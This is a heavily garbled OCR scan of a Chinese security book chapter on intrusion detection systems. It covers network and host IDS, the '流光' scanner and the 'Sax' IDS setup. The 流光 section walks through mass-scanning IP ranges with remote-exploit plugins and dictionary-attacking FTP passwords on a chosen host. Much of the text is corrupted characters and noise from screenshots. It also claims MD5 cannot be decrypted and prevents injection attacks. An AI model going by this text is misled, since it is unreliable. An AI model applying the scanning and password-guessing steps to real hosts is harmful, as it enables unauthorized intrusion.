还 可 以 利用 一 些 专业 的 漏 铜 扫 摘 工具 来 扫描 网 站 中 存在 的 漏洞 , 如 Acunetix 的 Web 漏 
洞 扫 摘 程 序 。 一 个 完善 的 漏洞 扫 摘 程序 可 以 专门 得 找 网 站 上 的 SQL 注入 式 漏 洞 。 

3. 对 重要 数据 进行 加 密 

采用 加 密 技术 对 网 站 中 重要 的 数据 进行 加 密 ， 如 用 MD5 加 密 。MDS5 没有 反问 算法 ， 
也 不 能 解密 ， 可 以 防范 注入 攻击 对 网 站 的 危害 。 
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每 个 用 户 都 希望 自己 的 计算 机 系统 能 够 时 刻 保持 在 较 佳 的 状态 中 ， 并 稳定 
安全 地 运行 ， 但 是 在 实际 工作 和 生活 中 又 总 是 避免 不 了 出 现 许 多 安全 问题 ， 针 
对 这 些 问题 ， 最 好 的 解决 办 法 就 是 利用 入 侵 检 测 系 统 来 保护 系统 的 安全 。 

学 会 系统 服务 器 的 入 侵 检 测 技术 ， 才 能 对 自己 的 计算 机 有 充分 的 了 解 ， 也 
才能 真正 地 将 安全 威胁 解除 ， 以 保证 自己 的 计算 机 系统 安全 。 本 章 将 主要 介绍 
各 种 典型 的 入 侵 检 测 系 统 。 

O 基于 网 络 的 入 侵 检 测 系统 

O 基于 主机 的 入 侵 检 测 系统 

O 基于 漏洞 的 入 侵 检 测 系统 

OO“ 萨 客 晰 ”入侵 检 测 系 统 


O 用 WAS 检测 网 站 


< 第 8 总 
黑客 入侵 检测 工具 


8.1 基于 网 络 的 入 侵 检测 系统 


基于 网 络 的 入 侵 检 测 系 统一 般 安 北 在 需要 保护 的 网 段 中 ， 利 用 网 络 侦 听 拉 术 实 时 监视 
网 段 中 传输 的 各 种 数据 包 ， 并 对 这 些 数据 包 的 内 容 、 源 地 址 、 目 的 地 址 等 进行 分 析 和 检测 。 
如 果 发 现 入 侵 行为 或 可 疑 事件 ， 入 侵 检 测 系 统 束 会 发 出 警报 其 至 切断 网 络 连接 ， 其 整个 入 
侵 检 柚 结 构 如 下 图 所 示 。 


网 络 接口 
基于 网 络 的 入 侵 检测 结构 
网 络 接口 卡 (NIC) 可 以 在 如 下 两 种 模式 下 工作 。 
@ 正常 模式 。 需 要 发 送 到 计算 机 (通过 包 的 以 太 网 或 MAC 地 址 进行 判断 ) 的 数据 包 ， 


通过 该 主机 系统 进行 中 继 转 发 。 
@ 混杂 便 式 。 此 时 以 太 网 上 所 能 见 到 的 数据 包 都 问 该 主机 系统 中 继 。 
一 块 网 卡 可 以 从 正常 模式 向 混杂 模式 转换 ， 通 过 使 用 操作 系统 的 压 层 功能 束 能 直接 告 
诉 网 卡 进行 该 改变 。 通 常 ， 基 于 网 络 的 入 侵 检 测 系 统 要 求 网 卡 处 于 混杂 模式 。 


8.1.1 包 蜗 探 器 和 网 络 监视 器 


包 咒 探 右 和 网 络 监视 器 的 最 初 设计 目的 是 帮助 监视 以 太 网 络 的 通信 。 最 初 有 两 种 产 
: Novell LANalyser 和 Network Monitor。 这 些 产品 可 以 抓获 所 有 网 络 上 能 够 看 到 的 数据 
。 一旦 抓获 这 些 数据 包 ， 束 可 以 进行 如 下 工作 。 
@ 可 以 对 包 进 行 统 计 。 统 计 通 过 的 数据 包 ， 并 统计 该 时 期 内 通过 的 数据 包 的 总 大 小 
(包括 总 的 开销 ， 如 包 的 报头 )， 可 很 好 地 知道 网 络 的 负载 状况 。Novell LANalyser 
和 Network Monitor 都 提供 了 网 络 相 关 人 负载 的 图 形 化 或 图 表 表 现形 式 。 
@ 可 以 评 细 地 检查 包 。 如 可 抓获 一 系列 到 达 Web 服务 喜 的 数据 包 来 诊断 服务 大 的 
问题 。 
近年 来 ， 包 串 探 产品 已 经 成 为 独立 的 产品 。 程 序 〈( 如 Ethereal 和 Network Monitor 的 最 
新 版 本 ) 可 以 对 内 部 各 种 类 型 的 包 进 行 拆 分 ， 从 而 可 以 知道 包 内 部 发 生 了 什么 类 型 的 通信 。 
这 些 工 具 同 时 也 能 被 用 来 进行 破坏 活动 。 


部 


8.1.2 包 隅 探 器 和 混杂 模式 


所 有 的 包 咒 探 右 部 要 求 网 络 接口 运行 在 混杂 模式 下 。 只 有 运行 在 混 淋 模式 下 ， 包 虽 探 
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宫 
PE 工具 攻 了 
全 人 人 他 
器 才能 接收 通过 网 络 接口 卡 的 每 个 包 。 在 安装 包 嗅 探 器 的 机 器 上 运行 包 嗅 探 器 通常 需要 管 
理 员 的 权限 ， 这 样 ， 网 卡 的 硬件 才能 被 设置 为 混杂 模式 。 

另外 一 点 需要 考虑 的 是 ， 在 交换 机 上 使 用 。 在 一 个 网 络 中 ， 交 换 机 比 集线器 使 用 得 更 
多 。 注意， 在 交换 机 的 一 个 接口 上 收 到 的 数据 包 不 总 是 被 送 向 交换 机 的 其 他 接口 的 。 由 于 
这 种 原因 ， 使 用 交换 机 多 的 环境 ( 比 都 使 用 集线器 的 环境 ) 通常 可 以 击败 包 嗅 探 器 的 使 用 。 


8.1:3” 包 嘿 探 器 的 发 展 : 基于 网 络 的 入 侵 检 测 


从 安全 的 观点 来 看 ， 包 咒 探 器 所 种 来 的 好 处 很 少 。 但 抓获 网 络 上 的 每 个 数据 包 ， 拆 分 
该 包 ， 然 后 再 根据 包 的 内 容 手 工 采 取 相 应 的 反应 ， 这 太 浪 费时 间 ， 有 什么 软件 可 以 上 日 动 为 
我 们 执行 这 些 程序 呢 。 

这 束 是 基于 网 络 的 入 侵 检测 系统 的 主要 工作 。 有 两 种 类 型 的 软件 包 可 以 用 来 进行 此 类 
入 侵 检 测 ， 那 束 是 : ISS Real Secure Ensgine 和 Network Flight Recorder。 

识别 各 种 各 样 有 可 能 是 欺骗 攻击 的 他。 将 IP 地 址 转化 为 MAC 地 址 的 ARP 协议 通常 
就 是 一 个 攻击 目标 。 如 采 在 一 个 以 太 网 上 发 送 伪造 的 ARP 数据 包 , 一 个 已 经 获得 系统 访问 
权限 的 入 侵 者 承 可 以 假 猴 是 一 个 不 同 的 系统 在 进行 操作 。 这 将 会 导致 各 种 各 样 的 拒绝 服务 
攻击 ， 也 叫 系 统 支持 。 入 侵 者 可 以 使 用 欺骗 攻击 将 数据 包 和 草 定 丫 到 目 己 的 系统 中 ， 同 时 在 
一 个 安全 的 网 络 上 进行 中 间 类 型 的 攻击 来 进行 欺骗。 

通过 对 ARP 数据 包 的 记录 , 其 于 网 络 的 入 侵 检 疯 系 统 束 能 识别 出 受害 的 源 以 太 网 地 址 
和 判断 是 否 是 一 个 破坏 者 。 当 检测 到 一 个 不 希望 看 到 的 活动 时 ， 基 于 网 络 的 入 侵 检测 系统 
将 会 采取 行动 ， 包 括 干 涉 从 入 侵 者 处 及 来 的 通信 或 午 狐 配置 附近 的 防火 卉 策略， 来 封锁 从 
入 侵 者 的 计算 机 或 网 络 发 来 的 所 有 通信 。 


8.2 ”基于 主机 的 和 人 侵 检 测 系统 


基于 主机 的 入 侵 检测 系统 运行 在 需要 监视 的 系统 上 。 它 们 监视 系统 并 判断 系统 上 的 活 
动 是 否 可 接受 。 如 末 一 个 网 络 数据 包 已 经 到 达 它 要 试图 进入 的 主机 ， 要 想 准 确 地 检测 出 来 
并 进行 阻止 ， 除 防火 场 和 网 络 监视 郝 外 ， 还 可 用 第 三 道 防线 来 阻止 ， 即 “基于 主机 的 入 侵 
检测 ”， 其 入 侵 检 测 结构 如 下 图 所 示 。 


TS 
攻击 模式 库 


展 三 三 二 三 三 三 全 二 三 三 三 三 二 
TREE 
配置 系统 库 
Wee ee | 系统 操作 


主机 系统 


基于 主机 的 入 侵 检 训 结 构 


两 种 基于 主机 的 入 侵 检 测 类 型 是 : 
@ 网 络 监视 器 。 它 监视 主机 的 网 络 连接 ， 并 试图 判断 这 些 连 接 是 个 是 一 个 威胁 。 并 可 
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检查 出 网 络 连 接 表 达 的 一 些 试图 进行 的 入 侵 类 型 。 记 住 ， 这 与 基于 网 络 的 入 侵 检测 
不 同 ， 因 为 它 只 监视 它 所 运行 的 主机 上 的 网 络 通 信 ， 而 不 是 通过 网 络 的 所 有 通信 。 
基于 此 种 原因 ， 它 不 需要 网 络 接口 处 于 混杂 模式 。 
@ 主机 监视 器 。 它 监视 文件 、 文 件 系 统 、 日 志 或 主机 其 他 部 分 ， 但 找 特定 类 型 的 活动 ， 
进而 判断 是 否 是 一 个 入 侵 企图 《或 一 个 成 功 的 入 侵 ) 之 后 通知 系统 管理 员 。 
1. 监视 主机 的 网 络 连 接 
在 数据 包 到 达 主 机 系统 的 网 络 层 之 前 ， 检 得 试 图 访问 主机 的 数据 包 是 可 以 的 。 这 种 机 
制 试图 在 到 达 的 数据 包 能 够 对 主机 造成 破坏 之 前 ， 截 获 访 数据 包 而 保护 该 主机 。 
可 以 采取 的 活动 主要 有 : 
@ 检测 试图 与 未 授权 的 TCP 或 UDP 端口 进行 的 连接 。 如 来 试 图 连接 没有 服务 的 端口 ， 
这 通 负 表明 入 侵 者 在 搜索 和 奉 找 漏 调 。 
@ 人 答 测 进来 的 痛 口 扫描 。 这 是 一 个 一 定 要 党 惕 的 问题 ， 并 给 防火 才 发 警告 或 修改 本 地 
的 IP 配置 以 拒绝 可 能 的 入 侵 者 主机 的 访问 。 
可 以 执行 这 种 监视 类 型 的 两 种 软件 产品 分 别 是 ISS 公司 的 Real Secure 和 Port Sentry。 
2. 监视 登录 活动 
尽管 管理 员 已 经 做 了 最 大 努力 ， 同 时 刚刚 配置 并 不 断 检 得 入 侵 检测 软件 ， 但 仍然 可 能 
有 东 些 入 侵 者 采取 目前 都 不 知道 的 入 侵 攻 击 方法 进入 系统 。 一 个 攻击 者 可 以 通过 各 种 方法 
( 包 咒 探 右 或 其 他 ) 获得 一 个 网 络 密码 ， 从 而 进入 该 系统 。 
查找 系统 上 的 “ 寞 第 ”活动 是 如 Host Sentry 软件 的 日 第 工作 。 这 种 类 型 的 包 监 视 器 发 
现 登 录 或 退出 操作 ， 即 给 系统 管理 员 发 送 和 警告， 告知 该 活动 是 异 关 的 或 不 布 望 出 现 的 。 
3. 监视 Root 的 活动 
获得 目标 系统 的 超级 用 户 〈Root) 或 管理 员 的 访问 权限 ， 是 所 有 入 侵 者 的 目标 。 但 除 
了 在 特定 的 时 间 内 对 系统 进行 定期 维护 外 ， 对 如 Web 服务 套 或 数据 库 服 务 右 ， 进 行 尽 好 的 
维护 和 在 可 徘 的 系统 上 对 超级 用 户 进 行 维 护 ， 通 单 是 几乎 没有 或 很 少 进 行 的 活动 。 但 入 侵 
者 不 信任 系统 维护 ， 他 们 很 少 在 定期 的 维护 时 间 工 作 ， 而 经 党 是 在 上 和 面 进行 很 长 时 间 的 活 
动 。 他 们 在 该 系统 上 执行 很 多 不 一 般 的 操作 ， 有 时 候 比 系统 管理 员 执 行 的 还 多 。 
4. 监视 文件 系统 
一 旦 一 个 入 侵 者 侵入 了 一 个 系统 (虽然 已 尽 最 大 努力 使 得 入 侵 检 测 系 统 发 挥 最 佳 效 末 ， 
但 也 不 能 完全 排除 入 侵 者 侵入 系统 的 可 能 性 )， 丈 要 改变 系统 的 文件 。 如 : 一 个 成 功 入 侵 者 
可 能 想 要 安装 一 个 包 咒 探 器 或 者 端口 扫 插 检测 占 ， 或 修改 一 些 系统 文件 或 程序 ， 使 得 系统 
不 能 检测 出 他 们 在 周围 进行 的 入 侵 活动 。 在 一 个 系统 上 安 站 软 件 通 常 包括 修改 系统 的 菜 些 
部 分 ， 这 些 修改 通常 包括 修改 系统 上 有 的 文件 或 库 。 


8.3 ”基于 漏洞 的 入 侵 检 测 系 统 


墨客 利用 漏 调 进入 系统 ， 再 悄然 离开 ， 整 个 过 程 可 能 系统 管理 员 坚 无 奈 觉 ， 等 黑客 在 
系统 内 明 作 非 为 后 再 发 现 已 为 时 已 晚 。 为 防 串 于 未 然 ， 应 对 系统 进行 扫描 ， 帮 发 现 漏 铜 应 
及 时 和 补救.“ 流光 ”在 国内 的 安全 爱好 者 们 心中 可 以 说 是 无 人 不 晓 ， 它 不 仅仅 古 一 个 安全 汤 
洞 扫 描 工 具 ， 更 是 一 个 功能 强大 的 渗透 测试 工具 。“ 流 光 ” 以 其 独特 的 C/S 结构 的 扫描 设计 
山 受 好 评 。 
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客 过 
.工具 人 攻 了 


8.3.1 运用 “流光 ”进行 批量 主机 扫描 


“流光 ” 因 使 用 功能 较 多 ， 所 以 对 初学 者 来 说 显得 稍微 有 点 儿 索 琐 ， 不 过 乎 好 这 个 过 程 
需要 的 时 间 不 会 太 长 ， 下 面 将 为 大 家 详细 讲述 用 “流光 ”扫描 主机 漏洞 的 方法 。 有 具体 操作 
步骤 如 下 。 


STEP01: 运行 “流光 ”软件 STEP02: 打开 “设置 ”对 话 框 


NE Te 


国 直属 次 作 -【 诞 光 50] Baad 3310 (6 用 方 
[二 有 辣 | 济 妃 1E】 本 看 fw)， 反击 号 ) 过 项 (0) 工具 [T) 短 敬 0H) 关于 {8) 
FT El 大 
门 | 新建 项 目 (0 ChlleM 


: EFE3 188.0. 1 


;这 168.0.255 


indowa HT/2O000 | 


Eo. Cilio 
国 或 目 澡 存 国 二 
项 目 号 大 加) [| 
上 次 映 近 项 目 几 ] 
ut | 下 
bd er A ”了 肥 小 榴 作 品 了 悍 所 有 
导入 记录 E 
漂 放 /本 影 挤 轩 他 是 
Femay Sensor 条 时 分 忻 


加 厅 开 底 吞 匡 ).- 


通 出 上 


选择 “文件 ”> “高 级 扫描 向 导 ” 菜单 命令 或 按 ” 图 输入 起 始 IP 地 址 和 终止 IP 

< Ctrl+W > 组 合 键 。 地 址 , 将 “目标 系统 ”设置 为 一 步 " 按钮 。 
"Windows NT/2000”。， 

STEP03: 打开 “PORTS” 对 话 杠 STEP04:， 连续 单 击 “下 一 步 ”按钮 


POp3 [Es 


口 标准 油 口 扫 撒 | sy 因 必 员 FOP3 乒 本 请 起 


FTP | 一 2 


De | 


| SiTP = 
固 暑 了 :39TF 希 直 | 


因 骂 得 百业 县 本 信息 
固 尝试 鳍 前 用 户 钴 号 


国 自 定 端口 扫 扬 范围 


由 PP 到 | Bas 


< 上 一 步 |®) 下 sm 取消 ”| 十 
= 一 下 wl 


指定 扫描 的 端口 范围 。 烟 单 击 “ 下 一 步 ” 按钮 。 依次 选择 默认 状态 并 单 击 “ 下 一 步 ”按钮 。 
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< 第 


EE EEC 


STEP05: 打开 “TELNET” 对 话 框 STEP06: 打开 “CGI Rules” 对 话 框 


四 莹 取 系 统 版 本 


HT 
HT 
HT 
IT 
HT 
江 
HT 
HI 


mw 


《上 一 步 @) 车 | 


取消 勾 选 “SunOS Login 


可 选择 “Windows NT/2000" Be 单 击 “ 下 一 
远程 溢出 ” 复 选 框 。 团 indow 02 


选项 ， 根 据 需 要 选中 或 清空 下 步 ” 按 钮 。 
方 扫 描 列 表 的 具体 选项 。 
STEP07: 依次 单 击 “ 下 一 步 ” 按 钮 STEP08: 打开 “PLUGINS” 对 话 框 
SQL [= 
EL 
iPe 
0 Fa] CcProxy B.2 Fxploit IT 
固 区 连接 DLL sassiamj 扫 全 ProntFade 2000 Extensien Exploit H 
aa Is 回 FTF Seryjer 多 
IIS 5.0 WEBDAY Exploit HT 
IIS5.0 HULL Printer Exploit HT 
固 过 icede 请 村 是 同 MLL Seqdsion hwaliable 于 
其 加 SB Get Ds 而 
lindows EON REC Locator Remote Exploit HT 
国 IIS 5.0 [WEEDAY Mnorymonse Deploy 于 
国 归 而 夸 下 得 蚤 一 - - 
固 竺 诅 mysaL 窗 码 全 部 选择 名 | ED 
辐 营 [ 匡 本 要 入 
《上 一 步 呈 [下 一 步 m >》 | | < 上 一 步 蚀 [Fw 取消 | 
依次 选择 默认 状态 并 单 击 “下 一 步 ” 按 钮 。 选择 “Windows NT/2000” 加 单 击 “下 一 


选项 。 步 ” 按钮 。 
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合 人 他 他 
STEP09: 打开 “选择 流光 主机 ”对 话 框 STEP10: 程序 开始 进行 扫描 
选择 流光 主机 


=] | 详情 oo | 端口。 [3555 


图 小 村 术科- [放下 530] Bad 3310 [52 用户) 


用 户 名 : [LocalHost 室 码 : PR 


| MG || | WC) | 


= 中 5 i [nol0 。 。 怪 到 下 时 


单 击 “ 开 始 ” 按 钮 。 可 查看 到 正在 扫描 的 内 容 。 


© “流光 ”的 扫描 引擎 既 可 以 安装 在 不 同 的 主机 上 ， 也 可 以 直接 从 本 地 启动 . 
提示 。 如 果 没 有 安装 过 任何 扫描 引擎 ，“ 流 光 ” 将 使 用 默认 的 本 地 扫描 引 党 


当 扫 插 到 安全 漏洞 时 ,“ 演 光 ” 会 弹出 一 个 “探测 结果 ”窗口 ， 在 其 中 可 以 看 到 能 够 连 
接 成 功 的 主机 和 其 扫描 到 的 安全 漏洞 信息 。 


8.3.2 ”运用 “流光 ”进行 指定 漏洞 扫 撞 


很 多 时 候 并 不 需要 对 指定 主机 进行 全 面 扫描 ， 而 是 根据 需要 对 指定 的 主机 漏洞 进行 扫 
描 。 比 方 说 ， 只 想 扫 描 指定 主机 是 否 具 有 FTP 方面 或 CGI 方面 的 漏洞 等 。 具 体 的 操作 步骤 
如 下 。 


STEP01: 加 入 需要 破解 的 站 点 名 称 STEP02: 打开 “添加 主机 ”对 话 框 


国 小 相识 件 - [流光 5.0]】 Build 3310 26 用户 ) 
| 交 件 (有 编 朝 ( 日 ”查看 fV) 探 刘 R) 选项 (O) 工具 (T) 帮助 (H】 关于 (A) | 
| 择 到 记录 查 所 :| | F 
| 团 B 显示 所 有 项 E < 
一 口 9 IMAP 主机 


漳 加 ..… 


BB 
MR 


在 “流光 ” 主 窗口 右 击 “FTP 主 机 ”， 在 快捷 菜单 输入 远程 主机 的 域 单 击 “ 确 定 " 按钮 。 
中 选择 “编辑 ”> “添加 ”菜单 命令 。 名 或 |P 地 址 。 


156 


3 


黑客 入 侵 检测 工具 


STEP03: 添加 用 户 和 窗 码 的 字典 STEP04: 打开 “打开 ”对 话 框 


园 小 棺 榨 件 - [这 光 5.0]】 Build 3310 (26 用 户 ) EE 加 和 7 
En 坊 袁 IE) 各 看 (VI 探 谢 (R) 人 工具 (站 “帮助 IH) 甘于 (A) Ei :| Fer 


BC Solflirrmed Tools 


ie erdic NameAr | Nermal dir pasveacrd_. 


空 梓 兴 一 条) | 用 户 列 表 文 余 


右 击 主 机 “192.168.0.10"， 在 快捷 菜单 中 选择 " 编 ”选择 “流光 ”安装 目录 中 含有 用 户 名 列表 的 Name 
辑 ”> “从 列表 添加 ”菜单 命令 。 文件 ， 单 击 “ 打 开 ” 按 钮 。 


STEP05: 双击 “显示 所 有 项 目 ” 项 STEP06: 选用 用 尸 名 


国光 0 uid 3310 C3 国 中 eers [站 元 501 Buid 3310 023 用户) ml eed ,| 二 | 二 本 
| 立 e 用 ”请 二 mi， 再 看 rw 后 动 向 培 井 [0 工 局 而 [一 | 到 于 1 让 村 [有 篇 时 要 是) RR _ 洁 更 (2 TR 夭 陆 mm 和。 新 于 tA] 
| [二 3 


车 入 轩 半 广 站 室 区-2083 路 相 帮 品 版 术 所 有 国 BW 让 二 1 和 e063 小 本 作品 医 加 所 有 
| | 二 机 户 阁 | | 于 网 ] 主 总 


bal 总 肯 本 


双击 后 , “显示 所 有 项 目 ” 项 将 切换 成 “隐藏 所 有 项 ”通过 复 选 框 来 决定 用 户 名 的 选用 与 否 。 
目 ” 项 ， 而 用 户 列表 中 的 所 有 用 户 都 将 被 显示 。 

按 《Ct+EF7》 忆捷 键 ， 即 可 令 “ 流 论 ” 开 始 FTP 的 轮 口 令 探 吉 。 当 “流光 ”探测 到 加 
口令 后 ， 在 主 窗口 下 方 将 会 出 现 探测 出 的 用 户 名 、 密 码 和 FTP 地 址 。 


8.4“ 联 客 噶 " 人 侵 检 测 系统 


目前 可 供 选 择 的 入 侵 检 训 系统 很 多 ， 除 了 入 侵 检 训 设 备 目 市 的 管理 系统 以 外 ， 还 可 以 
在 相应 的 检 训 主机 上 通过 安 闭 其 他 入 侵 检 测 工 具 来 实现 安全 检测 目的 ， 而 “ 耳 客 噶 ” 入 侵 
检测 系统 是 一 种 积极 主动 的 网 络 安全 防护 工具 ， 提 供 了 对 内 部 和 外 部 攻击 的 实时 保护 。 


8.4.1 “人防 客 断 ”入 侵 检 测 系统 简介 


利用 “侠客 噶 ” 入 侵 检 测 系 统 可 以 保护 网 络 安全 ， 该 软件 基于 协议 分 机 ， 并 采用 了 快 
速 的 多 模式 匹配 算法 ， 可 以 对 当前 复杂 融 速 的 网 络 进 行 快速 、 精 确 的 分 析 。 同 时 它 可 在 网 
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全 人 人 他 
络 安全 和 网 络 性 能 方面 提供 全 面 和 深入 的 数据 依据 ， 是 企 事业 单位 等 网 络 安全 立体 纵深 、 
多 层次 防御 的 重要 产品 。“ 陕 客 晰 ”入 侵 检 测 系 统 还 可 以 通过 对 网 络 中 所 有 传输 的 数据 进行 
智能 分 析 和 检测 ， 从 中 发 现 网 络 或 系统 中 是 否 有 违反 安全 策略 的 行为 和 被 攻击 的 迹象 ， 从 
而 在 网 络 系统 受到 危害 之 前 拦截 和 阻止 入 侵 .。“ 萨 客 听 ” 入 侵 检 测 系 统 的 主要 功能 如 下 。 

1) 入 侵 检 测 及 防御 : 利用 该 功能 可 以 检测 出 网 络 中 存在 的 黑客 入 侵 、 网 络 资源 小 
晴 虫 攻击 、 后 门 木 马 、ARP 欺骗 、 拒 绝 服 务 攻击 等 各 种 威胁 ， 同 时 可 以 根据 集 略 配置 主动 
切断 危险 行为 ， 从 而 实现 在 目标 网 络 进行 保护 的 目的 。 

2) 行为 审计 : 对 网 络 中 用 户 的 行为 进行 审计 记录 ， 包 括 用 户 访问 Web 网 站 、 收 发 邮 
件 、 使 用 FTP 传输 文件 、 使 用 MSN 或 QQ 等 即时 通信 软件 的 行为 ， 同 时 还 对 网 络 中 的 敏 
感 行为 进行 审计 ， 这 样 以 便 管理 员 友 现 潜在 的 网 络 威胁 。 

3) 流量 统计 : 对 网 络 流 量 进行 实时 显示 和 统计 分 析 ， 帮 助 管理 员 有 效 防御 网 络 资源 小 
用 、 蠕 虫 、 拒 绝 服务 攻击 ， 以 确保 用 户 网 络 正常 使 用 。 

4) 策略 自 定义 : 高 级 用 户 可 以 根据 自身 网 络 情况 ， 对 检测 规则 进行 定义 ， 制 定 针 对 用 
户 网 络 的 高 效 策 略 ， 以 加 强 入 侵 检 测 系统 的 检测 准确 性 。 

5) 警报 响应 : 对 和 警报 事件 进行 及 时 响应 ， 包 括 实 时 切断 会 话 连接 。 

6) IP 碎片 重组 :“ 陕 客 晰 ”入 侵 检 测 系统 能 够 进行 完全 的 了 琴 碎 片 重组 ， 发 现 所 有 的 基 
于 IP 父 片 的 攻击 。 

7) TCP 状态 跟踪 及 流 重 组 : 通过 对 TCP 协议 状态 的 跟踪 ， 以 避免 因 单 包 匹 配 造 成 的 
误 报 。 


8.4.2 设置 “ 萨 客 断 ” 入 侵 检测 系统 
在 使 用 “ 萨 客 晰 ”(Sax) 入 侵 检测 系统 来 防护 系统 或 网 络 安全 之 前 ， 需 要 对 该 软件 进 
行 设置 。 具 体 的 操作 步骤 如 下 。 


STEP01: 打开 “Saxll 入 侵 检 测 系 统 ” 主 窗口 STEP02: 打开 “设置 ”对 话 框 


etd 爷 记 置 
辐 | 常规 设置 | 到 适配器 设 秋 


聘 据 包 强 冲 区 的 大 小 :| 4095 千 字 节 [KB) 


驻 动 程序 读 取 数 据 包 的 最 大 间隔 时 间 : |1000 | [10-1000 座 种 
| 默认 设置 | 


| 


[einia 
Ed 


id bn 
上 上 喇 时 各 各 

FF 本 玉林 融 

上 志和 硬 于 可 

FE [~ 


下 本 生 芷 于 
Be | 


于 可 了 而 是 到 
Ea 
二 


Oo] [ 取 请 4G-] 


可 看 到 “ 按 节点 浏览 ”“ 运 行 状态 ”以 及 “统计 项 ”在 “常规 设置 ”选项 卡 中 可 对 “数据 包 缓 冲 区 的 大 
目 ” 3 个 部 分 ， 选 择 “ 监 控 ”>“ 常 规 设 置 ” 菜 单 ”小 ”和 “从 驱动 程序 读 取 数 据 包 的 最 大 间隔 时 间 ” 
命令 。 进行 设置 。 
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黑客 入 侵 检测 工具 


STEP03: 切换 至 “适配器 设置 ”选项 卡 STEP04: 打开 “别名 设置 ”对 话 框 


卉 引 避 计 办 
和 届 物理 地 址 | 有 PP 地址 [于 前 口 
| antansic L2 Fast Erhermet Controler (Mcrosofts Padet scheduler) | | 哈 增 加 区 车 


. 】 
物理 地 址 别名 
Theere are ro Kermes bo shyomws, 


查看 可 供 选择 的 网 卡 。 由 于 该 检测 系统 通过 适配器 ”选择 “设置 ”> “别名 设置 ”菜单 命令 ， 打 开 “ 别 
来 捕捉 网 络 中 正在 传输 的 数据 并 对 其 进行 分 析 ， 因 名 设置 ”对 话 杠 ， 在 其 中 可 对 物理 地 址 、1P 地 址 、 
此 正确 选择 网 卡 是 能 够 捕捉 到 入 侵 的 关键 一 步 。 。 ”端口 进行 各 种 操作 ， 如 添加 、 编 辑 、 删 除 、 导 出 等 。 
STEP05: 打开 “安全 策略 ”对 话 框 STEP06: 打开 “专家 检测 设置 ”对 话 杠 


同 TFTP PUT flename owatlow iherrpt 
相同 PMAP 
由 园 MFS 基于 
四 国正 TFTP! Triial Fils Trarefer Protocol ) 二 
IE 租用 太 向 目标 转 写 入 克 汕 
FTP_CTAL 位。 作 
9 FINGER 


汤 泣 。 加 里 你 
广 他 由 雹 杏 所 有 的 TFTP 户 入 ， 


下 
选择 “设置 ”>“ 安 全 策略 设置 ”菜单 命令 ， 打 开 “选择 “设置 ”> “专家 检测 设置 ”菜单 命令 ， 打 开 
“安全 策略 ”对 话 框 , 在 其 中 对 当前 所 选 策略 进行 衍 “专家 检测 设置 ” 对 话 框 ， 在 其 中 对 网 络 中 的 所 有 
生 、 查 看 、 启 用 、 删 除 、 导 入 、 导 出 和 升级 等 操作 。 通信 数据 进行 专家 级 智能 化 分 析 , 并 报告 入 侵 事件 。 


STEP07: 打开 “选项 ”对 话 杠 STEP08: 选择 “响应 方案 管理 ”功能 项 


郝 | 第 略 乔 证 设置 


| [取消 入 | | -应 用 | 


选择 “设置 ”> “选项 ”菜单 命令 ， 打 开 “ 选 项 ' 2 
对 话 框 ， 在 左边 列表 中 选择 “显示 ”功能 项 , 设置 ”修改 操作 ， 系 统 提 供 了 “ 仅 记录 日 ”加 "或 “修改 
是 否 启用 网 卡 地 址 、IP 地 址 和 端口 别名 等 属性 。 。 。 志 ”“ 阻 断 并 记录 日 志 ” 和 “干扰 ”按钮 。 

并 记录 日 志 ” 三 种 默认 的 响应 方案 

它们 是 不 能 被 删除 的 ， 但 可 以 修改 。 


| _ 
全- 工具 全 攻略 


合 人 他 他 


STEP09: 打开 “定义 响应 方 委 ”对 话 框 STEP10: 选择 “邮件 ”功能 项 


3 发 送 控 制 各 消息 
呢 运行 外 确 加 序 
由 -人 息 新 酸 块 

三 第 喇 升 如 设置 


对 名 称 、 响 应 动作 和 阻 断 会 话 方式 (只 有 选择 了 打开 “邮件 ”对 话 框 ， 在 其 中 对 发 送 邮 件 所 使 用 的 
“ 阻 断 会 话 ” 才 可 以 设置 阻 断 会 话 方式 ) 等 属性 进 ”服务 器 、 账 号、 密码 、 接 收 人 (多 个 接收 人 用 分 号 
行 设置 。 分 隔 ) 和 邮件 正文 进行 设置 。 

STEP11: 选择 “发 送 控制 台 消 息 ” 功 能 项 ”STEP12: 选择 “运行 外 部 程序 ”功能 项 


| 


诬 置 将 护 梳 消息 4 十 竺 的 | 书包 址 , 
厂 间 : CAWINNT esplorer .et 
| 


_ 万 弟 辐 天 生 设 置 


设置 接收 消息 的 目标 主机 的 |P 地 址 和 消息 正文 {发送 。 对 外 部 程序 的 完整 路 径 和 参数 进行 设置 。 
主机 和 接收 主机 必须 安装 Messenger 服 务 ) 等 属性 。 
STEP13: 选择 “分 析 模 块 ” 功 能 项 STEP14: 选择 “策略 升级 设置 ”功能 项 


日 者 机 种 区 局 十 i) 
百 


筷 用 日 志 交 件 
日 志文 件 踪 径 


st TELNE crt 
壕 "是 16 上 5 节 析 禄 
FINGER 秆 析 概 
De rE 
EE | 

堵 ELHD 季 析 器 


jh 


| 
大 | 


对 各 个 分 析 模 块 的 参数 进行 个 性 化 设置 ， 例 如 是 否 加 ' 萨 客 呆 " 入 侵 检测 系统 通过 自 妆 单 击 “ 确 

启用 该 分 析 模 块 、 检 测 的 端口 、 日 志 缓 冲 区 的 大 小 、 动 和 手工 两 种 方式 检测 策略 知识 库 定 ， 按钮 ， 即 

是 否 保存 日 志 等 。 更 新 ， 并 自动 完成 对 本 地 知识 库 的 完成 陕 客 噶 、 
更 新 。 如 果 选 择 自动 更 新 ， 还 必须 入 侵 检测 系统 
设置 更 新 的 日 期 和 时 间 。 的 设置 。 
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< 二 第 
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8:4.3 使 用 “ 萨 客 断 ”入 侵 检 测 系统 


在 完成 对 “ 院 客 嘲 ” 入 侵 检 测 系统 相关 设置 后 ， 残 可 以 使 用 该 软件 来 防护 网 络 或 本 机 
计算 机 的 安全 。 有 具体 的 操作 步骤 如 下 。 


STEP01: 打开 “了 萨 客 断 ” 入 侵 检 测 系 统 STEP02: 切换 至 “会 话 ” 选 项 卡 


| CT | 页 十 醒 。 屋 本 下 民国 而 标定 该 是: 下 本 各 和 各 二 区 所 HD 


r 和 | 时 恩 
| 面 可 
= En 辣 可 时 于 呈 亲王 


加 
EE 
| 
国 

CE 时 于 . 轨 - 丰 下 .省 . 半 -十 在 . 省 

可 纪 可 可 日 避 可 到 
: 二 


EEE 


5 
[9 
恒 
一 

wm 
FE 
吗 

Tn 

时 加 
量 

[DD 


EEEEES[ ELLELLLEE 引 省 EE 


s 昌 和 HE 
EEEEEEEEEEELLILE 


a TP TESTLIEIR 


